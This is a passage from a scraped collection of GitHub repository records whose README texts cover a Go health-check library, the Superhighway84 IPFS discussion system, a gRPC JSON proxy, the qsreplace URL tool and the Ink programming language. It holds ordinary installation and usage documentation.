need to define a more elaborate custom check.\nFor example when you need to manage state.\nFor these cases it's best to implement the `Check` interface yourself.\n\nLet's define a flexible example of the lottery check, that allows you to define a fail probability:\n```go\ntype Lottery struct {\n\tmyname string\n\tprobability float32\n}\n\nfunc (l Lottery) Execute() (details interface{}, err error) {\n\tlottery := rand.Float32()\n\tdetails = fmt.Sprintf(\"lottery=%f\", lottery)\n\tif lottery < l.probability {\n\t\terr = errors.New(\"Sorry, I failed\")\n\t}\n\treturn\n}\n\nfunc (l Lottery) Name() string {\n\treturn l.myname\n}\n```\n\nAnd register our custom check, scheduling it to run every 30 seconds (after a 1 second initial delay) with a 5 seconds timeout:\n```go\nh := gosundheit.New()\n...\n\nh.RegisterCheck(\n\tLottery{myname: \"custom.lottery.check\", probability:0.3},\n\tgosundheit.InitialDelay(1*time.Second),\n\tgosundheit.ExecutionPeriod(30*time.Second),\n\tgosundheit.ExecutionTimeout(5*time.Second),\n)\n```\n\n#### Custom Checks Notes\n1. If a check take longer than the specified rate period, then next execution will be delayed, \nbut will not be concurrently executed.\n1. Checks must complete within a reasonable time. If a check doesn't complete or gets hung, \nthe next check execution will be delayed. Use proper time outs.\n1. Checks must respect the provided context. Specifically, a check must abort its execution, and return an error, if the context has been cancelled. \n1. **A health-check name must be a metric name compatible string** \n (i.e. no funky characters, and spaces allowed - just make it simple like `clicks-db-check`).\n See here: https://help.datadoghq.com/hc/en-us/articles/203764705-What-are-valid-metric-names-\n\n### Expose Health Endpoint\nThe library provides an HTTP handler function for serving health stats in JSON format.\nYou can register it using your favorite HTTP implementation like so:\n```go\nhttp.Handle(\"/admin/health.json\", healthhttp.HandleHealthJSON(h))\n```\nThe endpoint can be called like so:\n```text\n~ $ curl -i http://localhost:8080/admin/health.json\nHTTP/1.1 503 Service Unavailable\nContent-Type: application/json\nDate: Tue, 22 Jan 2019 09:31:46 GMT\nContent-Length: 701\n\n{\n\t\"custom.lottery.check\": {\n\t\t\"message\": \"lottery=0.206583\",\n\t\t\"error\": {\n\t\t\t\"message\": \"Sorry, I failed\"\n\t\t},\n\t\t\"timestamp\": \"2019-01-22T11:31:44.632415432+02:00\",\n\t\t\"num_failures\": 2,\n\t\t\"first_failure_time\": \"2019-01-22T11:31:41.632400256+02:00\"\n\t},\n\t\"lottery.check\": {\n\t\t\"message\": \"lottery=0.865335\",\n\t\t\"timestamp\": \"2019-01-22T11:31:44.63244047+02:00\",\n\t\t\"num_failures\": 0,\n\t\t\"first_failure_time\": null\n\t},\n\t\"url.check\": {\n\t\t\"message\": \"http://httpbin.org/status/200,300\",\n\t\t\"error\": {\n\t\t\t\"message\": \"unexpected status code: '300' expected: '200'\"\n\t\t},\n\t\t\"timestamp\": \"2019-01-22T11:31:44.632442937+02:00\",\n\t\t\"num_failures\": 4,\n\t\t\"first_failure_time\": \"2019-01-22T11:31:38.632485339+02:00\"\n\t}\n}\n```\nOr for the shorter version:\n```text\n~ $ curl -i http://localhost:8080/admin/health.json?type=short\nHTTP/1.1 503 Service Unavailable\nContent-Type: application/json\nDate: Tue, 22 Jan 2019 09:40:19 GMT\nContent-Length: 105\n\n{\n\t\"custom.lottery.check\": \"PASS\",\n\t\"lottery.check\": \"PASS\",\n\t\"my.check\": \"FAIL\",\n\t\"url.check\": \"PASS\"\n}\n```\n\nThe `short` response type is suitable for the consul health checks / LB heath checks.\n\nThe response code is `200` when the tests pass, and `503` when they fail.\n\n### CheckListener\nIt is sometimes desired to keep track of checks execution and apply custom logic.\nFor example, you may want to add logging, or external metrics to your checks, \nor add some trigger some recovery logic when a check fails after 3 consecutive times.\n\nThe `gosundheit.CheckListener` interface allows you to hook this custom logic.\n\nFor example, lets add a logging listener to our health repository:\n```go\ntype checkEventsLogger struct{}\n\nfunc (l checkEventsLogger) OnCheckRegistered(name string, res gosundheit.Result) {\n\tlog.Printf(\"Check %q registered with initial result: %v\\n\", name, res)\n}\n\nfunc (l checkEventsLogger) OnCheckStarted(name string) {\n\tlog.Printf(\"Check %q started...\\n\", name)\n}\n\nfunc (l checkEventsLogger) OnCheckCompleted(name string, res gosundheit.Result) {\n\tlog.Printf(\"Check %q completed with result: %v\\n\", name, res)\n}\n```\n\nTo register your listener:\n```go\nh := gosundheit.New(gosundheit.WithCheckListeners(&checkEventsLogger))\n```\n\nPlease note that your `CheckListener` implementation must not block!\n\n### HealthListener\nIt is something desired to track changes in registered checks results.\nFor example, you may want to log the amount of results monitored, or send metrics on these results.\n\nThe `gosundheit.HealthListener` interface allows you to hook this custom logic.\n\nFor example, lets add a logging listener:\n```go\ntype healthLogger struct{}\n\nfunc (l healthLogger) OnResultsUpdated(results map[string]Result) {\n\tlog.Printf(\"There are %d results, general health is %t\\n\", len(results), allHealthy(results))\n}\n```\n\nTo register your listener:\n```go\nh := gosundheit.New(gosundheit.WithHealthListeners(&checkHealthLogger))\n```\n\n## Metrics\nThe library can expose metrics using a `CheckListener`. At the moment, OpenCensus is available and exposes the following metrics:\n* `health/check_status_by_name` - An aggregated health status gauge (0/1 for fail/pass) at the time of sampling.\nThe aggregation uses the following tags:\n * `check=allChecks` - all checks aggregation\n * `check=` - specific check aggregation\n* `health/check_count_by_name_and_status` - Aggregated pass/fail counts for checks, with the following tags: \n * `check=allChecks` - all checks aggregation\n * `check=` - specific check aggregation\n * `check-passing=[true|false]` \n* `health/executeTime` - The time it took to execute a checks. Using the following tag:\n * `check=` - specific check aggregation\n\n\nThe views can be registered like so:\n```go\nimport (\n\t\"github.com/AppsFlyer/go-sundheit\"\n\t\"github.com/AppsFlyer/go-sundheit/opencensus\"\n\t\"go.opencensus.io/stats/view\"\n)\n// This listener can act both as check and health listener for reporting metrics\noc := opencensus.NewMetricsListener()\nh := gosundheit.New(gosundheit.WithCheckListeners(oc), gosundheit.WithHealthListeners(oc))\n// ...\nview.Register(opencensus.DefaultHealthViews...)\n// or register individual views. For example:\nview.Register(opencensus.ViewCheckExecutionTime, opencensus.ViewCheckStatusByName, ...)\n```\n\n### Classification\n\nIt is sometimes required to report metrics for different check types (e.g. setup, liveness, readiness).\nTo report metrics using `classification` tag - it's possible to initialize the OpenCensus listener with classification:\n\n```go\n// startup\nopencensus.NewMetricsListener(opencensus.WithStartupClassification())\n// liveness\nopencensus.NewMetricsListener(opencensus.WithLivenessClassification())\n// readiness\nopencensus.NewMetricsListener(opencensus.WithReadinessClassification())\n// custom\nopencensus.NewMetricsListener(opencensus.WithClassification(\"custom\"))\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mrusme/superhighway84", "link": "https://github.com/mrusme/superhighway84", "tags": ["usenet", "ipfs", "decentralized", "decentralization", "discussion-forum", "bulletin-board-system", "forum", "orbitdb", "web3", "bbs", "community", "censorship-circumvention", "censorship-resistance", "free-speech", "merkle-dag", "p2p-network", "p2p", "p2p-database", "censorship", "uncensorable"], "stars": 512, "description": "USENET-inspired, uncensorable, decentralized internet discussion system running on IPFS & OrbitDB", "lang": "Go", "repo_lang": "", "readme": "Superhighway84\n--------------\n\n[![Superhighway84](superhighway84.jpeg)](superhighway84.png)\n\n```\n===============================================================================\n INTERACTIVE ASYNC / FULL DUPLEX\n===============================================================================\n\n Dial Up To 19.2 Kbps\n \n with\n\n _ _ _ __ ____ __ _ __ ___ ____\n / / / // / __/_ _____ ___ ____/ / (_)__ _/ / _ _____ ___ __( _ )/ / /\n _\\ _\\_\\_\\\\_\\ \\/ // / _ \\/ -_) __/ _ \\/ / _ \\/ _ \\ |/|/ / _ \\/ // / _ /_ _/\n / / / // /___/\\_,_/ .__/\\__/_/ /_//_/_/\\_, /_//_/__,__/\\_,_/\\_, /\\___/ /_/\n /_/ /___/ /___/\n\n ::: UNCENSORABLE USENET-INSPIRED DECENTRALIZED INTERNET DISCUSSION SYSTEM :::\n\n\n The V.H.S. (Very High Speed) Superhighway84 platform is more than just the\n fastest decentralized, uncensorable, USENET-inspired communications platform \n available. It is also the first one to be based on the latest \n IPFS technology available today!\n\n Superhighway84 offers the most spectacular features under the Spectrum.\n \n 100% Error Protection\n Data and Character Compression\n Alternate Bell Compatible Mode\n Long Haul Satellite Operation\n Network Diagnostics\n Fallback Mode\n And More!\n\n\n The Superhighway84 modern, uncensorable, \n decentralized internet discussion system.\n It should cost a lot more than $0.\n\n\n```\n\n![Screenshot](screenshot01.png)\n\nSuperhighway84 is an open source, terminal-based, IPFS-powered, USENET-inspired,\nuncensorable, decentralized peer-to-peer internet discussion system with retro\naesthetics.\n\n[More info here.](https://xn--gckvb8fzb.com/superhighway84/)\n\n\n\n## Installation\n\n### Prerequisites\n\nDownload the [kubo 0.16\nrelease](https://github.com/ipfs/kubo/releases/tag/v0.16.0) and unpack it:\n\n```sh\n$ tar -xzf ./kubo_*.tar.gz\n```\n\nIf you haven't used IPFS so far, initialize the IPFS repository using the \nfollowing command:\n\n```sh\n$ ./kubo/ipfs init\n```\n\nIf you had used IPFS an already have an IPFS repository in place, either\n(re)move it from `~/.ipfs` or make sure to `export IPFS_PATH` before running the\n`ipfs init` command, e.g.:\n\n```sh\n$ export IPFS_PATH=~/.ipfs-sh84\n$ ./go-ipfs/ipfs init\n```\n\n\n### From Release\n\nDownload the [latest\nrelease](https://github.com/mrusme/superhighway84/releases/latest) and unpack\nit:\n\n```sh\n$ tar -xzf ./superhighway84_*.tar.gz\n$ ./superhighway84\n```\n\nIf you initialized the IPFS repo under in a custom location, you need to prefix\n`IPFS_PATH`:\n\n```sh\n$ IPFS_PATH=~/.ipfs-sh84 ./superhighway84\n```\n\nThe binary `superhighway84` can be moved wherever you please.\n\n\n\n### From Source\n\nClone this repository\n\n- from [GitHub](https://github.com/mrusme/superhighway84)\n ```sh\n $ git@github.com:mrusme/superhighway84.git\n ```\n- from [Radicle](https://app.radicle.network/seeds/maple.radicle.garden/rad:git:hnrkcf9617a8pxxtw8caaop9ioe8cj5u4c4co)\n ```sh\n $ rad clone rad://maple.radicle.garden/hnrkcf9617a8pxxtw8caaop9ioe8cj5u4c4co\n ```\n\nThen cd into the cloned directory and run:\n\n```sh\n$ go build .\n```\n\nThe binary will be available at ./superhighway84 and can be moved wherever you\nplease.\n\n\n\n## Running\n\nFirst, check ulimit -n and verify that it's at a reasonable amount. IPFS\nrequires it to be large enough (>= 2048) in order to work properly over time.\n\nSecond, if your hardware shouldn't be a beefy computer but instead one of\nthose flimsy MacBooks, older hardware, a Raspberry or a low-memory VPS it is\nadvisable to set the previously created IPFS repository to the `lowpower`\nprofile.\n\n```sh\n$ ipfs config profile apply lowpower\n```\n\nThis should help with CPU usage, file descriptors and the amount of network\nconnections. While during the startup period you might still see peers peaking\nbetween 1k and 3k, connections should ultimately settle somewhere between 100\nand 300 peers.\n\nAfterwards you can simply launch the binary:\n\n```sh\n$ superhighway84\n```\n\nA setup wizard will help you with initial configuration. Please make sure to\nhave at least HOME and EDITOR exported in your environment.\n\nIn case you're intending to run the official IPFS daemon and Superhighway84 in\nparallel, be sure to adjust the ports in their respective IPFS repos (e.g.\n`~/.ipfs` and `~/.ipfs-sh84`) so that they won't utilize the same port numbers.\nThe ports `4001`, `5001` and `8080` are relevant and should be adjusted to\nsomething other for every new repo/IPFS node that will run in parallel, e.g.:\n\n```json\n \"Addresses\": {\n \"Swarm\": [\n \"/ip4/0.0.0.0/tcp/4002\",\n \"/ip6/::/tcp/4002\",\n \"/ip4/0.0.0.0/udp/4002/quic\",\n \"/ip6/::/udp/4002/quic\"\n ],\n \"Announce\": [],\n \"NoAnnounce\": [],\n \"API\": \"/ip4/127.0.0.1/tcp/5002\",\n \"Gateway\": \"/ip4/127.0.0.1/tcp/8081\"\n },\n```\n\n**NOTE**: When running Superhighway84 for the first time it might seem like it's\n\"hanging\" at the command prompt. Usually it isn't hanging but rather searching\nfor peer it can connect to in order to synchronize the database. Depending on\nhow many people are online, this process might take _some time_, please be\npatient.\n\n\n\n## Connectivity\n\nIf you're having trouble connecting to the IPFS network that might be due to\nyour network setup. Please try the IPFS `AutoRelay` feature in such a case:\n\n```sh\n$ ipfs config --json Swarm.RelayClient.Enabled true\n```\n\nMore information on this can be found here:\nhttps://github.com/ipfs/kubo/blob/master/docs/experimental-features.md#autorelay\n\n\n\n## Configuration\n\nSuperhighway84 will guide you through the basic configuration on its first run.\nThe configuration is stored at the path that you specified in the setup wizard.\nAfter it was successfully created, it can be adjusted manually and will take\neffect on the next launch of Superhighway84.\n\nConfiguration options that might be of interest:\n\n```\nArticlesListView =\n The view to be used for the articles lit. Possible values:\n 0 - threaded view, latest thread at the top\n 1 - list view, latest article at the top\n\n[Profile]\n From =\n The identifier that is being shown when posting an article, e.g. your name,\n username or email that you'd like to display\n\n Organization =\n An optional organization that you'd like to display affiliation with\n\n[Shortcuts]\n The shortcuts for navigating Superhighway84, can be reset to its defaults by\n simply removing the whole [Shortcuts] block and launching Superhighway84\n\n The structure is as following:\n\n ` = \"event\"`\n\n The key codes can be looked up under the following link:\n\n https://pkg.go.dev/github.com/gdamore/tcell/v2#Key\n\n For simple ASCII characters use their ASCII code, e.g. `114` for the character \n `r`.\n```\n\n\n## Usage\n\nThe default keyboard shortcuts are:\n\n```\n C-r: Refresh\n C-h: Focus groups list\nC-l, C-k: Focus articles list\n C-j: Focus preview pane\n C-q: Quit\n k: Move up in list\n j: Move down in list\n h: Move left in list\n l: Move right in list\n g: Move to the beginning of list/text\n G: Move to the end of list/text\n CR: Select item in list\n n: Publish new article\n r: Reply to selected article\n```\n\nHowever, you are free to customize these within your configuration file, under\nthe section `Shortcuts`. \n\n\n### Submit Article\n\nWhen submitting a new article or a reply to an article, the $EDITOR is launched\nin which a document with a specific structure will be visible. This structure\nconsists of the HEADER, a SEPARATOR and the BODY and looks like this:\n\n```\nSubject: This is the subject of the article\nNewsgroup: test.sandbox\n= = = = = =\nThis is the multiline\nbody of the article\n```\n\nThe HEADER contains all headers that are required for an article to be\nsubmitted. These are:\n\n- `Subject:`\\\n The subject of the article that will be shown in the articles list. The\n subject must only contain of printable ASCII characters.\n\n- `Newsgroup:`\\\n The newsgroup under which the article will be submitted, this can\n either be an existing group or a new group. Please try to follow\n the convention when creating new groups.\n The newsgroup must only contain of printable ASCII characters.\n\nThe SEPARATOR contains of 6 equal signs and 5 spaces, alternating each \nother, followed by a new line.\n\nThe BODY can contain of multiline text.\n\n\n\n## Known Limitations\n\n- The OrbitDB that Superhighway84 uses is a public database, meaning everyone\n can alter its data. Since its using a standard _docstore_, PUT and DELETE\n events can alter existing data. This issue will be solved in the future by\n customizing the store to ignore these types of events.\n\n- Superhighway84 is bound to the version of IPFS that Berty decides to support \n for go-orbit-db. go-orbit-db updates, on the other hand, seem to introduce\n breaking changes from time to time, which are hard to debug as someone without\n in-depth knowledge nor documentation. Since Superhighway84 is pretty much a\n one-man-show it would be quite challenging to fork go-orbit-db in order to\n keep it up to date with IPFS and make its interface more stable. Unfortunately\n there doesn't seem to be an alternative to Berty's go-orbit-db as of right\n now, so Superhighway84 is basically stuck with it.\n If you happen to know your way around IPFS and maybe even go-orbit-db, and\n would like to support this project, please get in touch!\n\n- If you have a newer IPFS version installed than the one used by\n Superhighway84, please make sure to **not upgrade** the IPFS_REPO that\n Superhighway84 is using. Otherwise you will get an error when starting\n Superhighway84 that will tell you that there is an IPFS repository mismatch:\n\n ```\n > panic: Your programs version (11) is lower than your repos (12).\n ```\n\n If this should be the case, please follow the instructions provided here:\n\n https://github.com/mrusme/superhighway84/issues/42#issuecomment-1100582472\n\n- If you encounter the following issue your IPFS repo version might be older\n than what Superhighway84 is using:\n\n ```\n > panic: ipfs repo needs migration\n ```\n\n In this case you might want to follow the IPFS migration guide here:\n\n https://github.com/ipfs/fs-repo-migrations/blob/master/run.md\n\n Alternatively use the same IPFS version as used by Superhighway84 to\n initialize a dedicated Superhighway84 repository. Please refer to the\n INSTALLATION part for how to do so.\n\n\n\n## Credits\n\n- Superhighway84 name, code and graphics by [mrusme](https://github.com/mrusme)\n- Logo backdrop by\n [Swift](https://twitter.com/Swift_1_2/status/1114865117533888512)\n\n\n", "readme_type": "markdown", "hn_comments": "Sounds interesting but my questions about any \"uncensorable\" service are* What's the plan to deal with one of Usenet's main downfalls? Spam.* What happens when it's used for illegal things even the staunchest of free speech advocates will agree need moderating? Child Porn etc...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jnewmano/grpc-json-proxy", "link": "https://github.com/jnewmano/grpc-json-proxy", "tags": [], "stars": 512, "description": "gRPC proxy for Postman like tools", "lang": "Go", "repo_lang": "", "readme": "# grpc-json-proxy\n\nGRPC JSON is a proxy which allows HTTP API tools like Postman to interact with gRPC servers.\n\n## Requirements\n- grpc+json codec must be enabled on the grpc server\n- Postman must be configured to use the proxy\n\nConfiguration of the proxy and its dependencies is a three step process.\n\n1. Register a JSON codec with the gRPC server. In Go, it can be automatically registered simple by adding the following import:\n\n`import _\"github.com/jnewmano/grpc-json-proxy/codec\"`\n\nIf you're using `gogo/protobuf` as your protobuf backend, import the following:\n\n`import _\"github.com/jnewmano/grpc-json-proxy/gogoprotobuf/codec\"`\n\n2. Run the grpc-json-proxy. Download pre-built binaries from https://github.com/jnewmano/grpc-json-proxy/releases/ or build from source:\n\n`go get -u github.com/jnewmano/grpc-json-proxy`\n\n`grpc-json-proxy`\n\nOther way, you can simply use `grpc-json-proxy` docker image out of the box:\n\n```bash\ndocker run -p 7001:7001 jnewmano/grpc-json-proxy\n```\n\n3. Configure Postman to send requests through the proxy.\nPostman -> Preferences -> Proxy -> Global Proxy\n\n`Proxy Server: localhost 7001`\n\n\n![Postman Proxy Configuration](https://cdn-images-1.medium.com/max/1600/1*oc09cwpCC9XrjpU9Gl5YTw.png)\n\nSetup your Postman gRPC request with the following:\n\n1. Set request method to Post .\n1. Set the URL to http://{{ grpc server address}}/{{proto package}}.{{proto service}}/{{method}} Always use http, proxy will establish a secure connection to the gRPC server.\n1. Set the Content-Type header to application/grpc+json .\n1. Optionally add a Grpc-Insecure header set to true for an insecure connection.\n1. Set the request body to appropriate JSON for the message. For reference, generated Go code includes JSON tags on the generated message structs.\n\n\nFor example:\n\n![Postman Example Request](https://cdn-images-1.medium.com/max/1600/1*npRlBiKxuJ5KMnnk0F5n6g.png)\n\n\n\nInspired by Johan Brandhorst's [grpc-json](https://jbrandhorst.com/post/grpc-json/)\n\n### Host accessibility\n\nIf you use docker image to run grpc-json-proxy server, and want to access grpc via loopback address `127.0.0.1`, you should pay attention to docker network accessibility.\n\n1. use `host.docker.internal` instead of `127.0.0.1` in Linux.\n2. use `docker.for.mac.host.internal` instead of `127.0.0.1` in MacOS and with Docker for Mac 17.12 or above.\n\nSee: https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tomnomnom/qsreplace", "link": "https://github.com/tomnomnom/qsreplace", "tags": [], "stars": 512, "description": "Accept URLs on stdin, replace all query string values with a user-supplied value", "lang": "Go", "repo_lang": "", "readme": "# qsreplace\n\nAccept URLs on stdin, replace all query string values with a user-supplied value, only output\neach combination of query string parameters once per host and path.\n\n## Usage\n\nExample input file:\n```\n\u25b6 cat urls.txt \nhttps://example.com/path?one=1&two=2\nhttps://example.com/path?two=2&one=1\nhttps://example.com/pathtwo?two=2&one=1\nhttps://example.net/a/path?two=2&one=1\n```\n\n### Replace Query String Values\n\n```\n\u25b6 cat urls.txt | qsreplace newval\nhttps://example.com/path?one=newval&two=newval\nhttps://example.com/pathtwo?one=newval&two=newval\nhttps://example.net/a/path?one=newval&two=newval\n```\n\n### Append to Query String Values\n\n```\n\u25b6 cat urls.txt | qsreplace -a newval\nhttps://example.com/path?one=1newval&two=2newval\nhttps://example.com/pathtwo?one=1newval&two=2newval\nhttps://example.net/a/path?one=1newval&two=2newval\n```\n\n### Remove Duplicate URL and Parameter Combinations\n\nYou can omit the argument to `-a` to only output each combination of URL and query string parameters once:\n```\n\u25b6 cat urls.txt | qsreplace -a \nhttps://example.com/path?one=1&two=2\nhttps://example.com/pathtwo?one=1&two=2\nhttps://example.net/a/path?one=1&two=2\n```\n\n## Install\n\nWith Go:\n\n```\n\u25b6 go install github.com/tomnomnom/qsreplace@latest\n```\n\nOr [download a release](https://github.com/tomnomnom/qsreplace/releases) and put it somewhere in your `$PATH`\n(e.g. in /usr/local/bin).\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thesephist/ink", "link": "https://github.com/thesephist/ink", "tags": ["golang", "programming-language", "javascript", "functional-programming", "ink-programming-language"], "stars": 512, "description": "Ink is a minimal programming language inspired by modern JavaScript and Go, with functional style.", "lang": "Go", "repo_lang": "", "readme": "
\n\t\"Ink\n\n# Ink programming language\n\n[![GoDoc](https://godoc.org/github.com/thesephist/ink?status.svg)](https://godoc.org/github.com/thesephist/ink)\n[![Build Status](https://travis-ci.com/thesephist/ink.svg?branch=master)](https://travis-ci.com/thesephist/ink)\n\nInk is a minimal programming language inspired by modern JavaScript and Go, with functional style. Ink can be embedded in Go applications with a simple interpreter API. Ink is used to write my current personal productivity suite, [Polyx](https://github.com/thesephist/polyx), as well as my day-to-day scripts and other small programs. Ink's documentation is on the [Ink website](https://dotink.co).\n\n
\n\n---\n\nInk has a few goals. In order, they are\n\n- Ink should have a simple, minimal syntax and feature set\n- Ink should be quickly readable and clear in expression\n- Ink should have a well designed, fully featured, and modular standard library\n- Ink should have an ergonomic interpreter and runtime API\n\nDesign is always a game of tradeoffs. Ink's goals for minimalism and readability / expressiveness means the language deliberately does not aim to be best in other ways:\n\n- Ink doesn't need to be highly efficient or fast, especially compared to compiled languages\n - However, within the constraints of the interpreter design, I try not to leave performance on the table, both in execution speed and in memory footprint. Efficiently composed Ink programs are between 2-4x slower than equivalent Python programs, in my experience. Small programs can run on as little as 3MB of memory, while the interpreter can stably scale up to gigabytes of memory for data-heavy tasks.\n- Ink doesn't need to be particularly concise, though we try to avoid verbosity when we can\n- Ink doesn't value platform portability as much as some other languages in this realm, like Lua or JavaScript -- not running on every piece of hardware available is okay, as long as it runs on most of the popular platforms\n\nThe rest of this README is a light introduction to the Ink language and documentation about the project and its interpreter, written in Go. For more information and formal specification about the Ink language itself, please see [SPEC.md](SPEC.md).\n\n## Introduction\n\nHere's an implementation of FizzBuzz in Ink.\n\n```ink\n` ink fizzbuzz implementation `\n\nstd := load('std')\n\nlog := std.log\nrange := std.range\neach := std.each\n\nfizzbuzz := n => each(\n\trange(1, n + 1, 1)\n\tn => [n % 3, n % 5] :: {\n\t\t[0, 0] -> log('FizzBuzz')\n\t\t[0, _] -> log('Fizz')\n\t\t[_, 0] -> log('Buzz')\n\t\t_ -> log(n)\n\t}\n)\n\nfizzbuzz(100)\n```\n\nHere's a simple Hello World HTTP server program.\n\n```ink\nstd := load('std')\n\nlog := std.log\n\nlisten('0.0.0.0:8080', evt => (\n\tevt.type :: {\n\t\t'error' -> log('Error: ' + evt.message)\n\t\t'req' -> (evt.end)({\n\t\t\tstatus: 200\n\t\t\theaders: {'Content-Type': 'text/plain'}\n\t\t\tbody: 'Hello, World!'\n\t\t})\n\t}\n))\n```\n\nIf you're looking for more realistic and complex examples, check out...\n\n- [the standard library](samples/std.ink)\n- [quicksort](samples/quicksort.ink)\n- [the standard test suite](samples/test.ink)\n- [Newton's root finding algorithm](samples/newton.ink)\n- [JSON serializer/deserializer](samples/json.ink)\n- [a small static file server](samples/fileserver.ink)\n- [Mandelbrot set renderer](samples/mandelbrot.ink)\n\nYou'll notice a few characteristics about Ink:\n\n- Functions are defined using arrows (`=>`) _a la_ JavaScript arrow functions\n- Ink does not have a looping primitive (no `for` or `while`), and instead defaults to tail-optimized recursion. Loops may be possible to have in syntax with macros in the near future.\n- Rather than using `if`/`else`, Ink uses pattern matching using the match (`::`) operator. Match expressions in Ink allows for very expressive definition of complex flow control.\n- Ink does not have explicit return statements. Instead, everything is an expression that evaluates to a value, and function bodies are a list of expressions whose last-evaluated expression value becomes the \"return value\" of the function.\n- As a general principle, Ink tries not to use English keywords in favor of a small set of short symbols.\n\nYou can find more sample code in the `samples/` directory and run them with `ink samples/.ink`.\n\n## Getting started\n\nYou can run Ink in three main ways:\n\n1. The Ink binary `ink` defaults to executing whatever comes through standard input, if there is any, or else starts a repl. So you can pipe any Ink script (say, `main.ink`) to the binary to execute it.\n```\n$ cat main.ink | ink\n\t# or\n$ ink < main.ink\n```\n2. Use `ink main.ink` to execute an Ink script file.\n3. Invoke `ink` without flags (or with the optional `-repl` flag) to start an interactive repl session, and start typing Ink code. You can run files in this context by loading Ink files into the context using the `load` builtin function, like `load('main')`. (Note that we remove the `.ink` file extension when we call `load`.)\n\nAdditionally, you can also invoke an Ink script with a [shebang](https://en.wikipedia.org/wiki/Shebang_(Unix)). Mark the _first line_ of your Ink program file with this directive, which tells the operating system to run the program file with `ink`, which will then accept this file and run it for you when you execute the file.\n\n```ink\n#!/usr/bin/env ink\n\n`` ... the rest of your program\n```\n\nYou can find an example of this in `samples/fileserver.ink`, which you can start by simply running `./samples/fileserver.ink` (without having to specifically call `ink samples/fileserver.ink`).\n\nTo summarize, ink's input priority is, from highest to lowest, `-repl` -> `-eval` -> files -> `stdin`. Note that command line flags to `ink` should _precede_ any program files given as arguments. If you need to pass a file name that begins with a dash, use `--`.\n\n## Why?\n\nI started the Ink project to become more familiar with how interpreters work, and to try my hand at designing a language that fit my preferences for the balance between elegance, simplicity, practicality, and expressiveness. The first part -- to learn about programming languages and interpreters -- is straightforward, so I want to expand on the second part.\n\nMy language of choice at work is currently JavaScript. JavaScript is expressive, very fast (for a dynamic language), and has an approach to concurrency that I really like, using a combination of closures with event loops and message passing to communicate between separate threads of execution. But JavaScript has grown increasingly large in its size and complexity, and also carries a lot of old cruft for sake of backwards compatibility. I've also been increasingly interested in composing programs from functional components, and there are features in the functional PL world that haven't yet made their way into JavaScript like expressive pattern matching and guaranteed tail recursion optimizations (the former has been in TC39 limbo for several years, and the latter is only supported by recent versions of WebKit/JavaScriptCore).\n\nSo Ink as a language is my attempt to build a language in the functional paradigm that doesn't sacrifice the concurrency benefits or expressiveness of JavaScript, while being minimal and self-consistent in syntax and semantics. I sometimes think about Ink as what JavaScript would be if it were rewritten by a Lisp programmer. Given this motivation, Ink tries to be a small language with little noise in the syntax, few special tokens, and a few essential builtins, that becomes expressive and powerful by being extremely composable and extensible. While modern dynamic languages routinely have over 100 syntactic forms, Ink has just 10 syntactic forms, from which everything else is derived. Ink deliberately avoids adding features into the language for sake of building a feature-rich language; whenever something can be achieved idiomatically within the constraints and patterns of the existing language or core libraries, that's preferred over adding new features into the language itself. This is how Ink remains tiny and self-consistent.\n\nI'm also very interested in Elixir's approach towards language development, where there is a finite set of features planned to be added to the language itself, and the language is designed to become \"complete\" at some point in its lifetime, after which further growth happens through extending the language with macros and the ecosystem. Since simplicity and minimalism is a core goal of Ink, this perspective really appeals to me, and you can expect Ink to become \"complete\" at some finite point in the future. In fact, the feature set documented in this repository today is probably 85-90% of the total language features Ink will get eventually.\n\n## Isolation and permissions model\n\nInk has a very small surface area to interface with the rest of the interpreter and runtime, which is through the list of builtin functions defined in `runtime.go`. In an effort to make it safe and easy to run potentially untrusted scripts, the Ink interpreter provides a few flags that determine whether the running Ink program may interface with the operating system in certain ways. Rather than simply fail or error on any restricted interface calls, the runtime will silently ignore the requested action and potentially return empty but valid data.\n\n- `-no-read`: When enabled, the builtin `read()` function will simply return an empty read, as if the file being read was of size 0. `-no-read` also blocks directory traversals.\n- `-no-write`: When enabled, the builtins `write()`, `delete()`, and `make()` will pretend to have written the requested data or finished the requested filesystem operations safely, but cause no change.\n- `-no-net`: When enabled, the builtin `listen()` function will pretend to have bound to a local network socket, but will not actually bind. The builtin `req()` will also pretend to have sent a valid request, but will do nothing.\n\nTo run an Ink program completely untrusted, run `ink -isolate` (with the \"isolate\" flag), which will revoke all revokable permissions from the running script.\n\n### Build scripts and Make\n\nInk uses [GNU Make](https://www.gnu.org/software/make/manual/make.html) to manage build and development processes:\n\n- `make test` runs the full test suite, including filesystem and syntax/parser tests\n- `make run` runs the _extra_ set of tests, which are at the moment just the full suite of samples in the repository\n- `make build-(platform)` builds the Ink interpreter for a given operating system target. For example, `make build-linux` will build Ink for Linux to `ink-linux`.\n- `make build` by itself builds all release targets. We currently build for 4 OS targets: Windows, macOS, Linux, and OpenBSD\n- `make install` installs Ink to your system\n- `make precommit` will perform any pre-commit checks for commiting changes to the development tree. Currently it lints and formats the Go code.\n- `make clean` cleans any files that may have been generated by running make scripts or sample Ink programs\n\n### Go API\n\nAs the baseline interpreter is currently written in Go, if you want to embed Ink within your own application, you can use the Go APIs from this package to do so.\n\nThe APIs are still in flux, but you can check out `main.go` and `eval.go` for the Go channels-based concurrent lexer/parser/evaler APIs. As the APIs are finalized, I'll put more information here directly.\n\nFor now, here's a minimal example of creating an execution context for Ink and running some Ink code from standard input, and from a file as an `io.Reader`. (In fact, this is very nearly the implementation of executing from stdin in the interpreter.)\n\n```go\npackage main\n\nimport (\n\t\"os\"\n\n\t\"github.com/thesephist/ink/pkg/ink\"\n)\n\nfunc main() {\n\t// Create an \"Engine\", which is a global execution context for the lifetime of an Ink program.\n\teng := ink.Engine{}\n\t// Create a \"Context\", which is a temporary execution context for a given source of input.\n\tctx := eng.CreateContext()\n\n\t// Execute code from an io.Reader\n\tctx.Exec(os.Stdin)\n\t// Wait until all concurrent callbacks finish from the program before exiting\n\teng.Listeners.Wait()\n}\n```\n\nTo run from a file, use `os.File` as an `io.Reader`.\n\n```go\npackage main\n\nimport 